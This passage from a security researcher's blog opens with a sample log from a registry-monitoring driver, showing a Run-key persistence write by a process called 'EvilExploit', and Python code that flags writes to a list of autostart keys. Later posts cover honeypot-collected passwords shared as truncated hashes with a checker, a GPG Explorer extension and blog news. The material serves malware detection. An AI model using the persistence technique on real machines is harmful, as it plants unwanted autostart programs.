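8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ EvilExploit # REG_SZ # 0000
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ EvilExploit
8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ EvilExploit # REG_SZ # 43003A005C00550073006500720073005C006A006F00650044006F0065005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C006D006D006100700055007000640061007400650072002E006500780065000000
8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bang # REG_DWORD_REG_DWORD_LITTLE_ENDIAN # 00000000
8E0 # RegNtQueryValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bitnuts
8E0 # RegNtPreSetValueKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bitnuts # REG_SZ # 0000
8E0 # RegNtPostOpenKeyEx # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Schlüssel #1
8E0 # RegNtRenameKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Neuer Schlüssel #1 -> Farid
8E0 # RegNtKeyHandleClose # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Farid
8E0 # RegNtPostOpenKeyEx # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Farid
8E0 # RegNtPreDeleteKey # \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Farid
8E0 # exiting
"""

AUTOSTART_MARKERS = (  # assumed rule set: substrings of typical persistence keys
    r"\currentversion\run", r"\currentversion\runonce",
    r"\windows\appinit_dlls", r"\image file execution options",
    r"\currentcontrolset\services",
)
# Notifications that change the registry (names as in the log plus two more
# well-known CmRegisterCallback classes); queries, opens and closes are ignored.
WRITE_EVENTS = {"RegNtPreSetValueKey", "RegNtRenameKey", "RegNtPreDeleteKey",
                "RegNtPreDeleteValueKey", "RegNtPreCreateKeyEx"}

def decode_value(reg_type, hex_data):
    """Values are logged as hex: REG_SZ is UTF-16LE, DWORDs are little-endian."""
    raw = bytes.fromhex(hex_data)
    if reg_type.startswith("REG_DWORD"):
        return int.from_bytes(raw, "little")
    if reg_type in ("REG_SZ", "REG_EXPAND_SZ"):
        return raw.decode("utf-16-le").rstrip("\x00")
    return raw   # other types are left undecoded

def parse_line(line):
    # Split only on the padded delimiter: key names may contain "#" (e.g. "Neuer Wert #1").
    fields = line.split(" # ")
    pid = fields[0]
    if len(fields) == 2 and fields[1] == "exiting":
        return {"pid": pid, "kind": "exit"}
    if not fields[1].startswith("RegNt"):   # process creation: PID # PPID # image # cmdline
        return {"pid": pid, "kind": "create", "ppid": fields[1],
                "image": fields[2], "cmdline": fields[3]}
    rec = {"pid": pid, "kind": "registry", "event": fields[1], "key": fields[2]}
    if rec["event"] == "RegNtRenameKey" and " -> " in rec["key"]:
        rec["key"], rec["new_name"] = rec["key"].split(" -> ", 1)
    if len(fields) >= 5:
        rec["type"] = fields[3]
        rec["value"] = decode_value(fields[3], fields[4])
    return rec

def scan(log_text, markers=AUTOSTART_MARKERS):
    """Return write events on autostart keys, each linked to the image of its PID."""
    images, findings = {}, []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec["kind"] == "create":
            images[rec["pid"]] = rec["image"]
        elif rec["kind"] == "registry" and rec["event"] in WRITE_EVENTS:
            if any(m in rec["key"].lower() for m in markers):
                findings.append({"pid": rec["pid"],
                                 "image": images.get(rec["pid"], "<unknown>"),
                                 "event": rec["event"], "key": rec["key"],
                                 "value": rec.get("value")})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["pid"], f["image"], f["event"], f["key"], repr(f["value"]))
```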

The driver is still under development, so if you have any questions or comments do not hesitate and contact me. Any feedback is appreciated. I am also interested in the rule sets you guys are using (or you would use to track malware). If you can share I would be happy and provide the information here for other researchers, so everybody benefits.

The driver is and will be free for non-commercial usage. If you use it in your own research projects let me know, so we may exchange knowledge and rules.

You can download the latest package here. Enjoy!

Why reinventing the wheel isn't always wrong

2015/03/30 by Flo

I stumbled across this article by evilsocket and fully agree with him.

I have often heard from people: this and that is already implemented, why do you waste any time programming your own tool, driver or whatever. They also complain that my solutions are not as perfect as solutions from other (OSS) projects etc... blah, blah...

Well, you might be right, but let me answer you crack-headed, genius egg heads:

" ... do not tell me that during your CS courses you've implemented everything, tried everything and came across every problem you could find while developing because this is bullshit ... "

I still like to understand how things work internally and behind the scenes. I hate sophisticated, heavyweight solutions that consume megabytes of space just to solve a tiny problem. I really like hacking and programming, and even if one of my solutions is not perfect, I have always learned a lot and gained experience that helps me to quickly understand complex IT problems today and in my daily job. I often see average academic dudes failing when it comes to the dirty details and when we leave the well-crafted roads; there, using off-the-shelf libraries is often no smart idea, because you really need deep knowledge.

Well, here is my suggestion for you: You shall start implementing the stuff yourself, not just using big-scale libraries from Java, PHP and Python or copying and pasting what you found by googling around. And by the way: keep your good advice to yourself if you aren't a true hacker. I am sick of you smart asses talking about things you've never ever made your hands dirty with!

A huge list of commonly used passwords

2015/03/15 by Flo

I have posted before about the brute-forcing bots out there that try to gain access to typical CMS and forum software by trying huge lists of passwords on typical user names. Since 2014 I have set up some honeypots that collect such access attempts against well-known fake CMS and blog systems.

I have now merged a list of about 500 MB of passwords I have collected so far. This was a research project to test how many passwords could be collected and which pass phrases these bots use. To provide you some benefit out of this project I have built a shrunk-down version of these passwords that may help you in finding weak passwords at your site. I have simply calculated the SHA-512 hash value of each password, converted the hash value to base64 and extracted the first 5 characters of the resulting string. Please note: this reduces the overall size but also maps several passwords to the same shrunk version.

Why did you do that? Well, regarding German laws and legal codes I am not allowed to publish password lists. It is also not recommended to share hash lists. Using shrunk hash lists does not disclose any valuable information to the bad guys, but it enables you to check your passwords against this list. If you build the base64 SHA-512 hash value of your password(s) and extract the first five characters of the result, you can still check it against my list and see if you find a hit. If yes, it is more likely that your password is already in a list such bots are using. If you want clear evidence you can contact me.
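The check described above in Python, as an added example (not the author's tooling). It assumes UTF-8 encoding and standard (non-URL-safe) base64, which the post does not specify, and it also shows how coarse a 5-character prefix is: 5 base64 characters carry 30 bits, so the whole mapping has only 2^30 buckets and a hit is a hint, not proof.

```python
import base64
import hashlib

PREFIX_LEN = 5  # number of base64 characters kept, as in the post


def shrink(password, length=PREFIX_LEN):
    """First `length` chars of base64(SHA-512(password)); assumes UTF-8 and standard base64."""
    digest = hashlib.sha512(password.encode("utf-8")).digest()
    return base64.b64encode(digest).decode("ascii")[:length]


def load_shrunk_list(text):
    """Parse a list with one shrunk token per line; blank lines are ignored."""
    return {line.strip() for line in text.splitlines() if line.strip()}


def check_passwords(candidates, shrunk_set):
    """Return the candidates whose shrunk form appears in the list (possible hits)."""
    return [p for p in candidates if shrink(p) in shrunk_set]


def bucket_count(length=PREFIX_LEN):
    """Each base64 character carries 6 bits, so a prefix of `length` chars has 64**length buckets."""
    return 64 ** length


def expected_false_positive_rate(list_size, length=PREFIX_LEN):
    """Rough probability that an unrelated password collides with some entry (list_size << buckets)."""
    return list_size / bucket_count(length)


# Constructed demo list built from a few well-known weak passwords (not the author's list).
DEMO_WEAK = ["123456", "password", "admin123"]
DEMO_LIST = load_shrunk_list("\n".join(shrink(p) for p in DEMO_WEAK))

if __name__ == "__main__":
    for pw in ["password", "correct horse battery staple"]:
        status = "HIT" if check_passwords([pw], DEMO_LIST) else "no hit"
        print(f"{pw!r}: {shrink(pw)} -> {status}")
    # With a list of e.g. 10 million tokens, roughly 1% of random passwords would hit by chance.
    print(f"false-positive rate for 10M entries: {expected_false_positive_rate(10_000_000):.3%}")
```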

You can download the list here: shrinked_pwd_hashes.7z

Integrate GPG into your Windows Explorer’s Shell

2015/03/05 by Flo

I like small and tiny installations without the bloat of help files, shiny user interfaces, tray icons, all day running background tasks etc. That's why I implemented the "quick and dirty" GPG4Win Shell integration.

Summarized: This is a shell-extension to integrate GPG encryption into Microsoft Windows Explorer without installing all the bloat GPG4Win usually ships.

How to install:

1. Extract the content of the file.
2. Open up a command prompt (cmd.exe) as administrator.
3. Go to the extracted folder and start the install.cmd script.

If everything works out fine you are now able to encrypt and decrypt files and folders with GPG4Win by using the Windows context menu (right click on a folder or file). Just select one of the new entries. A command shell will open up showing some status information and asking you for the recipient's GPG ID to encrypt, or for your password to decrypt.

This is it, now have fun encrypting your files with GPG.

Some initial words for 2015

2015/02/08 by Flo

Well, after a lot of work in December and January I am back. Since I founded Excubits my private blog was a bit neglected, but I am back again and will post on my blog. The password hash checker is already in the pipeline and will hopefully be released during February, so you can check if your password is already on the lists these brute-forcing bots are using to log into well-known CMS. Having several honeypots set up, I now have a huge collection of passwords. Thanks to all the script kiddies out there who were heavily penetrating my honeypots in the last few weeks ☺.

Regarding my drivers I have to announce that they will be removed from the blog. The descriptions and whitepapers will remain, but all demo versions will just contain a text file linking to Excubits now. So, all related binaries and support will be handled through Excubits from now on. If you are interested in Türsteher (Bouncer), MZWriteScanner and ExecutableCheckers, you shall visit my company's web page for demo versions and additional information. You should register for our newsletter, so you will never miss any news. By the way, we are testing Türsteher Plus right now and will start the private beta phase soon. Türsteher (Bouncer) Plus will support SHA-2 hash based signatures on executables and will enhance security even further.

Regarding all the other stuff, everything remains as before. The main structure of the Blog remains, there was just a little face lifting as you may have noticed.

Back in the day I featured a blog post on how to easily include Brainpool curves into OpenSSL (see the archives). I also love big integers, public key cryptography and especially the elegance of elliptic curve cryptography, so it is no wonder that I also love TweetNaCl. Hence I am now using JavaScript TweetNaCl for all comments sent through my contact form. But I am also able to receive TweetNaCl-encrypted files. If you would like to contact me using TweetNaCl crypto, feel free to make use of my public key:
There will be more in 2015:

I now feel comfortable enough to announce T!NKle CMS -- my home-brew Content Management System that will be featured here soon. It is a true file-based NO-SQL and easy-to-use CMS for everyone. If you are a web designer you gonna love T!NKle. It is easy to set up, easy to use and fast as hell. Just design your web page in HTML5/CSS, include three or four lines of additional macros into your template and that is it. T!NKle is already in use by third parties (e.g. early-bird web designers), and they all love its awesome simplicity and instant architecture. You gonna love it, too! So stay tuned and watch out for T!NKle.